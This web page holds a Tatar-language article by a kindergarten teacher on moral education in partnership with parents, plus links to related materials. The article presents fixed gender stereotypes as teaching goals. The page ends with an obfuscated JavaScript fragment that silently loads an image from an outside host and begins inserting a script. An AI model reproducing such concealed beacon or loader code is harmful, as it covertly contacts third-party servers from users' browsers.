Балалар бакчасында әдәп-әхлак тәрбиясен гаилә белән берлектә бирү
статья (средняя, старшая, подготовительная группа) на тему

Шарафутдинова Миляуша Габдулхаевна

Әдәп-әхлак тәрбиясе

Скачать:

ВложениеРазмер
Файл Әдәп-әхлак тәрбиясе21.18 КБ

Предварительный просмотр:

Шарафутдинова Миляуша Габдулхаевна

Воспитатель 1 категории МАДОУ №88

г.Нижнекамск

Балалар бакчасында әдәп –әхлак тәрбиясен гаилә  белән берлектә бирү.(Социальное партнерство с родителями в нравственном воспитании детей)

Һәр тәрбияче һәм ата-ана үзенең баласының сәламәт һәм бәхетле булуын тели һәм шуңа ирешүне максат итеп куя.Без балаларны сәламәт яшәү рәвешенә күнектерергә тиешбез. Яман гадәтләрдән арындырырга, дөрес тукланырга, кешеләргә карата эчкерсез мөнәсәбәттә булырга, мохтаҗларга ярдәмгә килергә өйрәтергә тиешбез. Бүген җәмгыятьтә барлыкка килгән күренешләр гаиләнең әхлакый нигезе урнашуына да кире йогынты ясый: балалар һәм ата-аналар бер-берсеннән читләшә, каршылыклар көчәя һәм шуңа бәйле акыл үсешендә дә һәм үз-үзен тотышында да проблемалары барлыкка килгән балалар саны арта бара. Һәр гаилә үз баласын итәгатьле, эш сөючән, белемле, кешелекле итеп тәрбияләргә тырыша. Ләкин тәрбия эше бервакытта да җиңел булмаган. Ләкин ни генә булмасын, баланың төп хокукларының берсе – ул гаилә җылысын тоеп, гаиләдә тәрбияләнергә тиеш. Бары тик аны яратучы, аңа шәхес итеп караучы гаиләдә генә ул җәмгыятьтә үз урынын табарга, өлкәннәргә, әти - әнисенә хөрмәт белән карарга, кешеләр белән аралашырга, туган хакын хакларга өйрәнеп үсә. Киләчәк тормышы өчен гаять әһәмиятле булган хезмәт күнекмәләрен дә ул бары тик гаиләдә генә үзләштерә ала. Әйе, ата – ана назын, тәрбиясен берни белән дә алыштыра алмый. Баланың шәхес булып формалашуы, иң беренче чиратта, гаилә тәрбиясенә бәйләнгән. Үземнең эш практикасыннан чыгып шуны әйтәсем килә: әти - әниләр белән иңгә - иң куеп эшләгәндә генә нәтиҗәләргә ирешеп була. Ата – ана – бала –тәрбияче арасындагы дустанә мөнәсәбәт бәйрәм – кичәләрдә ныграк ныгый. Шунысын да әйтеп үтәргә кирәк: гаилә тормышын җайга салмыйча, ата – аналар белән даими эшләмичә, тәрбия эшендә уңышларга ирешү мөмкин түгел. Тәрбиянең төп асылы –балалар бакчасы белән гаиләнең бердәмлегендә. Бала иң элек тәрбияне гаиләдә ала. Без, балалар бакчасы хезмәткәрләре, гаилә салган фундаментны ныгытабыз, үстерәбез, җәмәгать урыннарында үз – үзләрен әдәпле – әхлаклы тоту кагыйдәләренә төшендерәбез. Занятиеларда балаларга төрле проблемалы сораулар, ситуацияләр куеп, алар белән чыгу юлларын да барлыйбыз.
                  «Балалар - безнен картлыгыбыз, начар тәрбия- киләчәктәге кайгыбыз, күз яшьләребез, башка кешеләр һәм бөтен ил алдындагы гаебебез» - диде күренекле педагог А.С.Макаренко. Баланын шәхес итеп формалашуы, иң беренче чиратта, гаилэ тәрбиясенә бәйләнгән. Ата-ана - төп тәрбияче. Тәрбия кылу өчен үзенә һәр яктан тәрбияле булу кирәк. Бакча һәм гаилә тәрбиясе бердәм булганда, балага бердәм таләп куелганда гына балалар тэрбияләү шатлыклы, ике якка да канәгатьләнү хисе бирә торган һәм нәтиҗәле була.
Мәгълүм булуынча, бала күп вакытын гаиләдә үткәрә. Биредә, әлбәттә, ата-ананың үз-үзен тотуы балага үрнәк булып тора. Шуңа күрә тәрбияви эшне ата-аналардан башлау дөресрәк. Моның өчен гаиләдә тынычлык, үзара ярдәмләшү, гаиләдәге кешеләр сәламәтлеге турында кайгырту — матур гадәтләрнең берсе.Безнең  бакчада һәм өйдә баланың индивидуаль сәләтен үстерүгә уңайлы шартлар тудыру өчен бакча һәм гаилә арасында уңай мөнәсәбәтләр булдыру тәрбия эшенең төп максатларыннан санала. Бу җәһәттән ата-аналар белән очрашып әңгәмәләр кору, гаиләләр белән спорт уеннары оештыру да тәрбия бирүнең төп юнәлешләренең берсе.
Бала шәхес буларак тулысынча ачылсын өчен, аның янында аны аңлаган, ягымлы сүзләр белән җылыткан, кирәк чакта яклый белгән ата-анасы булырга тиеш. Гаилә–баланың иң төп тәрбиячесе, тотрыклы гаилә традицияләре булмаган өйдә балага дөрес тәрбия биреп, аны әхлаклы итеп үстерү дә бик авыр була. Гаилә әгъзалары белән бакчаларда бергә чаралар оештыру балада әдәп тәрбияләү мәсьәләләрен хәл итәргә мөмкинлек бирә.Балаларны кечкенәдән инсафлы, әдәпле, тәрбияле итеп тәрбияләү – әти-әниләрнең җаваплы һәм изге бурычы. Үз-үзеңне тоту, аралашу күнекмәләре бирү гаиләдә, балалар бакчасында башлана. Тәрбия – ата-аналарның, тәрбиячеләрнең зур осталыгын, тырышлыгын һәм түземлеген таләп итә торган дәвамлы эш. 2 яшькә кадәрге балалар күбесенчә гаиләдә тәрбияләнә. Димәк, әдәплелек кагыйдәләре өйдә әти-әни, әби-бабай тарафыннан өйрәтелә. Бу эш ата-аналардан зур тырышлык һәм сабырлык тәлап итә. Балаларга “алай ярамый”, “болай эшләмә” дип өзлексез тукып, кисәтеп торулар гына уңай нәтиҗәләр бирми. Әхлак тәрбиясе бирү эзлекле, даими алып барылырга тиеш. Гаиләдә нигез итеп салынган балалар бакчасында тагын да үстерелә, камилләштерелә. Тәрбия эше кешелек җәмгыяте барлыкка килгәннән бирле яши. Тәрбия иҗтимагый күренеш. Тәрбия эшенең стратегик максаты, асылда, бала шәхесенең барлык эчке табигый көчләрен хәрәкәткә китерүдән, аны физик һәм рухи яктан әзерләп, яңа җәмгыять шартларында интелектуаль – әхлакый шәхес буларак эш итә алучы ирекле бер зат итеп тәрбияләүдән гыйбрәт. Рухи ярлылык әхлаксызлык тудыра. Әхлаксыз җәмгыятнең киләчәге юк. Шуңа күрә бала кечкенә булганда үк әхлак тәрбиясенә игътибар бирергә дип саныйбыз. Яхшыны яманнан, яманны яхшыдан аера белү тәрбиясе кешедә яштән үк тәрбияләнә.Балаларның социаль-шәхси үсеше “Балалар бакчасында тәрбия һәм белем бирү программасының” “Бала һәм әйләнә-тирә дөнья”, “Әхлак тәрбиясе”, “Хезмәт тәрбиясе”, “Культура-гигиеник күнекмәләр тәрбияләү”  бүлекләрендә ачыклана. Балаларның предмет тирәлеге һәм җәмгыять тормышы күренешләре белән танышулары “Бала һәм әйләнә-тирә дөнья” бүлегендә тәкъдим ителә.

Әхлак тәрбиясе бурычлары беренче кечкенәләр төркеменнән башлап тормышка ашырыла. Бу төркемдә балаларга аларның җенес буенча аерымлау турында башлангыч мәгълумат бирелә: малайлар кыска чәчле була, алар күлмәк, чалбар, шорты кияләр, ә кызлар озын чәчле булалар, алар бантик тагалар, матур, чәчәкле күлмәк кияләр. Икенче кечкенәләр төркемендә бу белемнәр тирәнәйтелә: малайлар күбрәк машина, туп белән уйнылар, ә кызлар курчак белән, малалар көчлерәк, кыюрак булалар, ә кызлар көчсезрәк. Уртанчылар төркемендә инде малайларда кызларга карата, ә кызларда малайларга карата хөрмәт тәрбияләнә башлый. Зурлар төркемендә малайларны кызларга карта игътибар күрсәтергә өйрәтәләр: кызларга урындык алып килергә, аларга булышлык күрсәтергә һәм башкалар. Кызларда исә тыйнаклык тәбияләргә, әйләнә-тирәдәгеләрне кайгыртырга, малайлар күрсәткән игътибарга рәхмәт әйтергә өйрәтергә кирәк. Мәктәпкәчә әзерлек төркемендә малайларда һәм кызларда үз җенесе вәкилләренә хас булган сыйфалар тәрбияләүне дәвам итәргә кирәк: малайларда кызларга булышу, ярдәмчеллек, урын бирү, ишектән чыкканда алдан үткәрү сыйфатларын, ә кызларда – тыйнаклык, кайгыртучанлык, пөхтәлек кебек сыйфатларны. Әхлак тәрбисе бирү нәтиҗәсендә балаларда:

-әйләнә-тирә дөньяга карата уңай караш тәрбияләнә;

-гаиләсенә, туган иленә мәхәббәт тәрбияләнә;

-коллективта үзара мөнәсәбәтләр, үз-үзеңне культуралы тоту күнекмәләре, бергәләп уйнау һәм эшләү осталыгы, үзеңнең һәм башкаларның эшләгән эшләрен гадел бәяләү сәләте формалаша;

– социаль-иҗтимагый сыйфатлар тәрбияләнә.

Шуңа күрә тәрбияче һәр балага хөрмәт белән карарга тиеш, балаларның бер-берсе белән эмоциональ-уңай мөнәсәбәттә аралашуны оештыра белергә тиеш дип саныйм.

Ата-аналарга гаиләдә бу күренешләрне тәрбияләргә киңәш ителә. Аларны шулай үк төрле матур әдәбият, сюжетлы ролле уеннар аша бирү мөһим. Мәсәлән: без  төркемдәге ата-аналарга шундый китаплар тәкъдим итәбез: “Иң матур сүз”, “Гөлбакча”, “Уйный-уйный үсәбез”, “Тел күрке – сүз”, “Тел дигән дәрья бар”, шулай ук бу китапларны төркемдә режим моментларында актив кулланабыз. Аларның эчтәлеген сөйлибез, морален аңлатабыз. Ә сюжетлы-ролле уеннар, мәсәлән, “Гаилә” уеныныда гаилә мөнәсәбәтләре, әти-әниләргә хөрмәт тәрбияләнә, ә инде “Кибет”, “Ветеринар клиникасында”, “Яшелчә кибетендә”, “Аптека” һәм башка уеннарда олыларга хөрмәт, сөйләшкәндә ягымлы сүзләр кулланырга өйрәтәлә.

Шулай итеп, безнең балаларыбыз инсафлы, тәртипле һәм әдәпле булсын өчен, киләчәктә тормышлары якты, матур, күңел тынычлыгы булсын өчен аларны кечкенәдән үк бу әйберләрне өйрәтеп үстерү төп максатларыбызның берсе. Максатларны тормышка ашыру – ата-аналарның һәм тәрбиячеләрнең зур тырышлыкларын тәләп итә торган эш.


По теме: методические разработки, презентации и конспекты

Балалар бакчасында әдәп-әхлак тәрбиясе

Балаларны кечкенәдән инсафлы, әдәпле, тәрбияле итеп тәрбияләү – әти-әниләрнең җаваплы һәм изге бурычы. Үз-үзеңне тоту, аралашу күнекмәләре бирү гаиләдә, балалар бакчасында башлана. Тәрбия – ата-аналар...

Балалар бакчасында әдәп-әхлак тәрбия

Балалар бакчасында әдәп-әхлак тәрбия турында презентация....

Балалар бакчасында әдәп-әхлак тәрбиясе

Балалар бакчасында әдәп-әхлак тәрбиясе...

Әти – әниләр өчен киңәшләр «Балалар бакчасында әдәп – әхлак тәрбиясе» Кечкенәләр төркеме

Әти – әниләр өчен киңәшләр«Балалар бакчасында әдәп – әхлак тәрбиясе»Кечкенәләр төркеме...

Балалар бакчасында әдәп-әхлак тәрбиясе

                   Балаларны кечкенәдән инсафлы, әдәпле, тәрбияле итеп тәрбияләү –әти-әниләрнең җаваплы һәм изге бурычы. Үз-үзеңне тоту, ...

Әти – әниләр өчен киңәшләр «Балалар бакчасында әдәп – әхлак тәрбиясе» Кечкенәләр төркеме

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'hlzeeb.lussoit.com\',\'39\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.creat...